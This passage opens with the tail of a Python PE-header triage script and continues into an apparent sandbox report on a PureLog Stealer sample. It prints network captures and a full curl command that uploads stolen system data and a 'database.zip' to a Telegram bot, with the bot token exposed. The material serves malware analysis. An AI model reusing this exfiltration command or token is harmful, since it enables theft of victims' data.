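    struct.pack_into("<I", dos, 0x3C, E_LFANEW)
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0x66D3A04D, 0, 0, 240, 0x0022)
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII",
                      0x20B, 48, 0,                            # PE32+ magic, linker version
                      0x59800, 0x200, 0, entry_rva, 0x2000,    # sizes, AddressOfEntryPoint, BaseOfCode
                      0x400000, 0x2000, 0x200,                 # ImageBase, section/file alignment
                      4, 0, 0, 0, 4, 0, 0,                     # OS/image/subsystem versions, Win32VersionValue
                      0x5E000, 0x200, 0, 2, 0x8540,            # SizeOfImage, SizeOfHeaders, CheckSum, GUI, DllCharacteristics
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[DIR_IMPORT], dirs[DIR_RESOURCE], dirs[DIR_CLR] = import_dir, (0x5C000, 0x10), clr_dir
    opt += b"".join(struct.pack("<II", va, size) for va, size in dirs)
    secs = struct.pack(SECTION_FMT, b".text", 0x59680, 0x2000, 0x59800, 0x200, 0, 0, 0, 0, 0x60000020)
    secs += struct.pack(SECTION_FMT, b".rsrc", 0x10, 0x5C000, 0x200, 0x59A00, 0, 0, 0, 0, 0xC0000040)
    return bytes(dos) + b"PE\x00\x00" + coff + opt + secs


def parse_pe64(data):
    """Parse the headers of a PE32+ image into a dict (raises ValueError on anything else)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]
    if data[pe_off:pe_off + 4] != b"PE\x00\x00":
        raise ValueError("bad PE signature")
    machine, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe_off + 4)
    opt = pe_off + 24                                   # signature (4) + COFF header (20)
    if struct.unpack_from("<H", data, opt)[0] != 0x20B:
        raise ValueError("only PE32+ is handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<Q", data, opt + 24)[0]
    ndirs = struct.unpack_from("<I", data, opt + 108)[0]
    dirs = [struct.unpack_from("<II", data, opt + 112 + 8 * i) for i in range(ndirs)]
    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr, *_ = struct.unpack_from(SECTION_FMT, data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\x00").decode(), "va": va, "vsize": vsize,
                         "rawsize": rawsize, "rawptr": rawptr})
    return {"machine": machine, "entry_rva": entry_rva, "image_base": image_base,
            "dirs": dirs, "sections": sections}


def section_for_rva(sections, rva):
    """Name of the section containing rva, or None when it lies in the headers or nowhere."""
    for s in sections:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["name"]
    return None


def rva_to_offset(pe, rva):
    """File offset for rva; header RVAs map 1:1, unmapped RVAs give None."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
            return s["rawptr"] + (rva - s["va"])
    first_raw = min((s["rawptr"] for s in pe["sections"]), default=None)
    return rva if first_raw is None or rva < first_raw else None


def classify(data):
    """Entry-point facts a triage analyst wants before trusting an 'entrypoint' disassembly."""
    pe = parse_pe64(data)
    clr_va, clr_size = pe["dirs"][DIR_CLR]
    imp_va, _ = pe["dirs"][DIR_IMPORT]
    ep_off = rva_to_offset(pe, pe["entry_rva"])
    return {
        "managed": clr_size != 0,
        "clr_header_section": section_for_rva(pe["sections"], clr_va) if clr_size else None,
        "has_import_table": imp_va != 0,
        "native_entry_point": pe["entry_rva"] != 0,
        "entry_va": pe["image_base"] + pe["entry_rva"],
        "entry_section": section_for_rva(pe["sections"], pe["entry_rva"]),
        # With entry RVA 0 these are the DOS header bytes, which a disassembler
        # renders as dec ebp / pop edx / nop / add ..., exactly as in the report.
        "entry_bytes": data[ep_off:ep_off + 12] if ep_off is not None else b"",
    }


if __name__ == "__main__":
    print("managed, as reported:", classify(build_constructed_pe64()))
    print("native-style variant:", classify(build_constructed_pe64(
        entry_rva=0x2050, import_dir=(0x2000, 0x4F), clr_dir=(0, 0))))
```

For a real file, pass its bytes to classify(); for a managed-only image like this sample the result should show managed true, native_entry_point false, entry_section None and entry_bytes beginning with "MZ", which is the combination that tells you to start triage at the CLR header (or in a .NET decompiler) rather than at the listed instructions.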
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 1, 2024 01:08:59.088182926 CEST | 49730 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:08:59.088221073 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:08:59.088296890 CEST | 49730 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:08:59.096311092 CEST | 49730 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:08:59.096323013 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:08:59.738909960 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:08:59.739036083 CEST | 49730 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:08:59.741645098 CEST | 49730 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:08:59.741652012 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:08:59.741863012 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:08:59.757572889 CEST | 49730 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:08:59.804505110 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:00.043582916 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:00.048475027 CEST | 49730 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:00.048502922 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:00.363153934 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:00.363305092 CEST | 443 | 49730 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:00.365330935 CEST | 49730 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:00.368611097 CEST | 49730 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:06.961524010 CEST | 49733 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:06.961560965 CEST | 443 | 49733 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:06.961833000 CEST | 49733 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:06.973418951 CEST | 49733 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:06.973432064 CEST | 443 | 49733 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:07.578028917 CEST | 443 | 49733 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:07.578105927 CEST | 49733 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:07.579659939 CEST | 49733 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:07.579667091 CEST | 443 | 49733 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:07.579868078 CEST | 443 | 49733 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:07.582612991 CEST | 49733 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:07.582943916 CEST | 49733 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:07.582967997 CEST | 443 | 49733 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:08.269546986 CEST | 443 | 49733 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:08.269625902 CEST | 443 | 49733 | 149.154.167.220 | 192.168.2.4
Sep 1, 2024 01:09:08.269942045 CEST | 49733 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:08.277296066 CEST | 49733 | 443 | 192.168.2.4 | 149.154.167.220
Sep 1, 2024 01:09:08.277308941 CEST | 443 | 49733 | 149.154.167.220 | 192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 1, 2024 01:08:59.077136993 CEST | 60495 | 53 | 192.168.2.4 | 1.1.1.1
Sep 1, 2024 01:08:59.083726883 CEST | 53 | 60495 | 1.1.1.1 | 192.168.2.4
Sep 1, 2024 01:09:26.259202957 CEST | 53 | 64305 | 162.159.36.2 | 192.168.2.4
Sep 1, 2024 01:09:26.749711990 CEST | 63577 | 53 | 192.168.2.4 | 1.1.1.1
Sep 1, 2024 01:09:26.758505106 CEST | 53 | 63577 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 1, 2024 01:08:59.077136993 CEST | 192.168.2.4 | 1.1.1.1 | 0x8d0d | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Sep 1, 2024 01:09:26.749711990 CEST | 192.168.2.4 | 1.1.1.1 | 0xd522 | Standard query (0) | 171.39.242.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 1, 2024 01:08:59.083726883 CEST | 1.1.1.1 | 192.168.2.4 | 0x8d0d | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
Sep 1, 2024 01:09:26.758505106 CEST | 1.1.1.1 | 192.168.2.4 | 0xd522 | Name error (3) | 171.39.242.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
                              • api.telegram.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 149.154.167.220 | 443 | 2588 | C:\Users\user\Desktop\n0PDCyrFnf.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-31 23:08:59 UTC | 312 | OUT | POST /bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendMessage HTTP/1.1
                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
                              Content-Type: application/json; charset=utf-8
                              Host: api.telegram.org
                              Content-Length: 438
                              Expect: 100-continue
                              Connection: Keep-Alive
2024-08-31 23:09:00 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-08-31 23:09:00 UTC | 438 | OUT | Data Raw: 7b 0d 0a 20 20 20 20 22 63 68 61 74 5f 69 64 22 3a 20 20 22 2d 31 30 30 32 31 36 35 34 38 30 38 35 30 22 2c 0d 0a 20 20 20 20 22 74 65 78 74 22 3a 20 20 22 53 59 53 54 45 4d 20 44 41 54 41 5c 72 5c 6e 2d 20 41 6e 74 69 76 69 72 75 73 20 3a 20 57 69 6e 64 6f 77 73 20 44 65 66 65 6e 64 65 72 5c 72 5c 6e 5c 72 5c 6e 48 61 72 64 77 61 72 65 3a 5c 72 5c 6e 2d 20 55 70 74 69 6d 65 3a 20 33 34 32 20 64 61 79 73 20 31 31 20 68 6f 75 72 73 20 31 30 20 6d 69 6e 75 74 65 73 20 33 35 20 73 65 63 6f 6e 64 73 5c 72 5c 6e 2d 20 4f 53 3a 20 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 5c 72 5c 6e 2d 20 53 63 72 65 65 6e 20 53 69 7a 65 3a 20 31 32 38 30 20 78 20 31 30 32 34 5c 72 5c 6e 2d 20 43 50 55 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65
                              Data Ascii: { "chat_id": "-1002165480850", "text": "SYSTEM DATA\r\n- Antivirus : Windows Defender\r\n\r\nHardware:\r\n- Uptime: 342 days 11 hours 10 minutes 35 seconds\r\n- OS: Microsoft Windows 10 Pro\r\n- Screen Size: 1280 x 1024\r\n- CPU: Intel(R) Core
2024-08-31 23:09:00 UTC | 947 | IN | HTTP/1.1 200 OK
                              Server: nginx/1.18.0
                              Date: Sat, 31 Aug 2024 23:09:00 GMT
                              Content-Type: application/json
                              Content-Length: 559
                              Connection: close
                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                              {"ok":true,"result":{"message_id":12,"from":{"id":7516945260,"is_bot":true,"first_name":"bypasservm","username":"bypasservmbot"},"chat":{"id":-1002165480850,"title":"UNSTOPPABLE","type":"supergroup"},"date":1725145740,"text":"SYSTEM DATA\n- Antivirus : Windows Defender\n\nHardware:\n- Uptime: 342 days 11 hours 10 minutes 35 seconds\n- OS: Microsoft Windows 10 Pro\n- Screen Size: 1280 x 1024\n- CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n- GPU: K8F5EY\n- RAM: 4.00 GB\n- HWID: 71434D56-1548-ED3D-AEE6-C75AECD93BF0"}}


                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                              1           192.168.2.4  49733        149.154.167.220  443               2080  C:\Windows\System32\curl.exe
                              Timestamp  Bytes transferred  Direction  Data
                              2024-08-31 23:09:07 UTC  251  OUT  POST /bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument HTTP/1.1
                              Host: api.telegram.org
                              User-Agent: curl/7.83.1
                              Accept: */*
                              Content-Length: 9488
                              Content-Type: multipart/form-data; boundary=------------------------42278cd3296aea35
                              2024-08-31 23:09:07 UTC  9488  OUT  Data Ascii: --------------------------42278cd3296aea35Content-Disposition: form-data; name="document"; filename="database.zip"Content-Type: application/octet-streamPK!Y5$!database\DLLs_in_memory.txtYrJ}TfbU3;c)UQQ
                              2024-08-31 23:09:08 UTC  388  IN  HTTP/1.1 200 OK
                              Server: nginx/1.18.0
                              Date: Sat, 31 Aug 2024 23:09:08 GMT
                              Content-Type: application/json
                              Content-Length: 432
                              Connection: close
                              Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                              Access-Control-Allow-Origin: *
                              Access-Control-Allow-Methods: GET, POST, OPTIONS
                              Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                              2024-08-31 23:09:08 UTC  432  IN  Data Ascii: {"ok":true,"result":{"message_id":13,"from":{"id":7516945260,"is_bot":true,"first_name":"bypasservm","username":"bypasservmbot"},"chat":{"id":-1002165480850,"title":"UNSTOPPABLE","type":"supergroup"},"date":1725145748,"document":{"file_name":"database.zip


                              Target ID:0
                              Start time:19:08:51
                              Start date:31/08/2024
                              Path:C:\Users\user\Desktop\n0PDCyrFnf.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Users\user\Desktop\n0PDCyrFnf.exe"
                              Imagebase:0x880000
                              File size:367'616 bytes
                              MD5 hash:88E5D9D97D0E3C83E74926986D6E5EF6
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1638451242.0000000000882000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                              Reputation:low
                              Has exited:true

                              Target ID:1
                              Start time:19:08:57
                              Start date:31/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:19:08:57
                              Start date:31/08/2024
                              Path:C:\Windows\System32\wbem\WMIC.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\Wbem\WMIC.exe" path Win32_VideoController get VideoModeDescription /format:csv
                              Imagebase:0x7ff7da0b0000
                              File size:576'000 bytes
                              MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:3
                              Start time:19:09:05
                              Start date:31/08/2024
                              Path:C:\Windows\System32\curl.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\curl.exe" -X POST -H "content-type: multipart/form-data" -F document=@C:\Users\user\AppData\Local\Temp\database.zip -F chat_id=-1002165480850 https://api.telegram.org/bot7516945260:AAHF6P58pJ_k3-YC5EE4VeOIq-d7pE8Iyag/sendDocument
                              Imagebase:0x7ff7a84a0000
                              File size:530'944 bytes
                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              Target ID:6
                              Start time:19:09:17
                              Start date:31/08/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                                • API String ID:
                                • Opcode ID: 79840aca49e298e2be530aed91244380d1da01f805fdbcd9b9a30990d55b2515
                                • Instruction ID: c46167d1d75aea228ace7bfd279ce75b95b13ee233bdf47b6c0184514a4e0179
                                • Opcode Fuzzy Hash: 79840aca49e298e2be530aed91244380d1da01f805fdbcd9b9a30990d55b2515
                                • Instruction Fuzzy Hash: 11418130B29D0D9FEBB4EB6AC064A7973E1EFA8300F410679E10EC35B1CE24E9418B40
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 42cff17ddaab9d30df466cec214d50adb53304768ea8c76f748366e82966bf18
                                • Instruction ID: 3beac82e240d67dcca4ea6f2c68ed3ccdcb35642808f938176ca40c8b55d1eb0
                                • Opcode Fuzzy Hash: 42cff17ddaab9d30df466cec214d50adb53304768ea8c76f748366e82966bf18
                                • Instruction Fuzzy Hash: 78415A61A1EBCA0FE36A977944645B17FE1DF96210B0941FFE49ACB0F3DC0968068351
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 33e89fb053aaf5a641289ced4eed32b2be79ee0af151aafc76cf076929bfab86
                                • Instruction ID: 38d5f30c7cf17b57bd6ad4de36b8893623873f8e5cc1d25fe1c5d7ae973e4b27
                                • Opcode Fuzzy Hash: 33e89fb053aaf5a641289ced4eed32b2be79ee0af151aafc76cf076929bfab86
                                • Instruction Fuzzy Hash: 63312662F2DE4E0BE768A66A44A46B173D0EBA4340F40057EF59FC31E3DD1879028340
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830778276.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b750000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 454ba1df61282a4c357cfcb0401e2473b6a970b53ccaec09410f3a54e5036bc1
                                • Instruction ID: 9becca7786e0cf2522ab4264e8f040a74eea3be4cd3e210cd1df17bf70c1381e
                                • Opcode Fuzzy Hash: 454ba1df61282a4c357cfcb0401e2473b6a970b53ccaec09410f3a54e5036bc1
                                • Instruction Fuzzy Hash: 3D41C362F0FBCA0FEBA59AE8047D2B87AD0EF51254B5A01BAD05EC31F3DD5D690A4301
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 976f56c02a8f388b98978737d40bbc7b2f01ed66dbffa1cb40d85b2d79132a74
                                • Instruction ID: 1c621419b5fcc4ec2640e88af2d8e20bd2ff2b28fe9bd8e612236c66e9792294
                                • Opcode Fuzzy Hash: 976f56c02a8f388b98978737d40bbc7b2f01ed66dbffa1cb40d85b2d79132a74
                                • Instruction Fuzzy Hash: 6F310A21B1CA2D0FE798B76C646AAF577D2DF48325F5440BAE41EC72E7DD18AC4142C0
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5d6d16cd390702b2eaa63b9f2a69e10642f98e8028d5be804a7dcc8f3763741b
                                • Instruction ID: 0c62dd4ea64ec3a58178e016848bc18a0294e391c9606cde2c6a01d59ad90bd1
                                • Opcode Fuzzy Hash: 5d6d16cd390702b2eaa63b9f2a69e10642f98e8028d5be804a7dcc8f3763741b
                                • Instruction Fuzzy Hash: DB31643072990D9FDBA4DF6AC469A7977E1FFA8301B45027AE00EC75B2CB24E955CB40
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: cf4a6c11045efca543b7f8a28747d8594c23382d9199896e35252b1387d4bf3e
                                • Instruction ID: 29dba857a154df737409bf43670c65b647074d18efbed0927b01ec7c7658a4cf
                                • Opcode Fuzzy Hash: cf4a6c11045efca543b7f8a28747d8594c23382d9199896e35252b1387d4bf3e
                                • Instruction Fuzzy Hash: 76315031F1D42D4EEBA4EA9894757F867E1EF48310F5201B9D46EC72B2ED28BA814A01
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 59443427bf60fa1b2a971a159f1aa9efc90a951725e4bb5855f24960887be1f5
                                • Instruction ID: ce3fb9c62824e50700e637e86b3f2aeb330b3bfcc43b8abf007e2205b23b93b9
                                • Opcode Fuzzy Hash: 59443427bf60fa1b2a971a159f1aa9efc90a951725e4bb5855f24960887be1f5
                                • Instruction Fuzzy Hash: C9313A26B0E29D8FE7219B6998201EC7FB0EF51720F1544B7C0548F1D2DB383A89CB51
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830778276.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b750000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 49bc2a8865f6364f1dfb78e0224fd608df1ca6a1684b2176fd535a2f742a9514
                                • Instruction ID: f68b20baca88a692f76e3509e53a78777097a655ca80c197468f0abda8fe452b
                                • Opcode Fuzzy Hash: 49bc2a8865f6364f1dfb78e0224fd608df1ca6a1684b2176fd535a2f742a9514
                                • Instruction Fuzzy Hash: 9531B062B0FBCA0BFBA5A6E848B51BC3AD0AF16354B1D02FAD449C60F3DD5D29468701
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ccb31ef7019565fa24384d7412228590dca809a6e392776afcdc9eaff570600d
                                • Instruction ID: c35c8b0277f3cec99f4d45216f0d7053f01adc8d179c1ad2701338a9a705be74
                                • Opcode Fuzzy Hash: ccb31ef7019565fa24384d7412228590dca809a6e392776afcdc9eaff570600d
                                • Instruction Fuzzy Hash: 0831A230A0D65D8FDB55EB64C868AB97BF0FF5A310F0545FAC05ADB1A2DB38A945CB00
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d1df0be1b58f5d871a7b823835201a9d730dd13d306d87b2312c86c155c493c8
                                • Instruction ID: 15544b15b3899b5045f65c8566c5f5d5fdfef5dded60742c493f82caa76ebe83
                                • Opcode Fuzzy Hash: d1df0be1b58f5d871a7b823835201a9d730dd13d306d87b2312c86c155c493c8
                                • Instruction Fuzzy Hash: 5F21D130729A0A4FDB54EA6DC89096177E1EFA932071143BDE05EC72E6DA28EC85C780
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 5448fe60b721339cc7aca80505029fa6c462a1925460348c7ccccf273c4d91e3
                                • Instruction ID: 1e5c2bd538e5509c270e2903dbc47871491e602cf5a507dfb03a639cf5d8d988
                                • Opcode Fuzzy Hash: 5448fe60b721339cc7aca80505029fa6c462a1925460348c7ccccf273c4d91e3
                                • Instruction Fuzzy Hash: A0212621B2C92D0FE798BB6C5469A7576D6EF88315F4100B9E41EC33E7DD28AD418681
                                Memory Dump Source
                                • Source File: 00000000.00000002.1830229431.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b6b0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 950d1495877aba1025e9216ecb2318ca87c1348187a1363fe5fa8a28e5ec50af
                                • Instruction ID: 195cc94a3af50908222e09d039bd44dc978a3ebcd9247d8b25b1af18d289f5cf
                                • Opcode Fuzzy Hash: 950d1495877aba1025e9216ecb2318ca87c1348187a1363fe5fa8a28e5ec50af
                                • Instruction Fuzzy Hash: 9721B521A1E52E4FEBA4EA64C46DAB977F0EF55350F15017AE42DCB1B2EE247E418B00
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d81c358bf27ab007f9460333c6f5c32a73d1b9f7c31a30ae6d3daee4bd028a8f
                                • Instruction ID: f70122721efd51682e3bbb6e9e75746d9fd58c54368c651608ebff2f0d5712f3
                                • Opcode Fuzzy Hash: d81c358bf27ab007f9460333c6f5c32a73d1b9f7c31a30ae6d3daee4bd028a8f
                                • Instruction Fuzzy Hash: 61219D3172C7059FD758DE5CD891469B3E1EBD8320B100A2EF49AC3296DA36F8428B82
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffd9b9d0000_n0PDCyrFnf.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: fed41320afc173c896005e882c1928bdf0a52e2c50b4d4e02f6adf10fd284c4b
                                • Instruction ID: aaf50d2042e33f45f4e2ca6ab988ba52bd5b97350e380788b5cf8f2db698f701
                                • Opcode Fuzzy Hash: fed41320afc173c896005e882c1928bdf0a52e2c50b4d4e02f6adf10fd284c4b
                                • Instruction Fuzzy Hash: CC112661B1EB890FD7A6976954B45A47BE0EFA921270901FBD44CCB1A7DC186C428351
                                Memory Dump Source
                                • Source File: 00000000.00000002.1836314924.00007FFD9B9D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B9D0000, based on PE: false
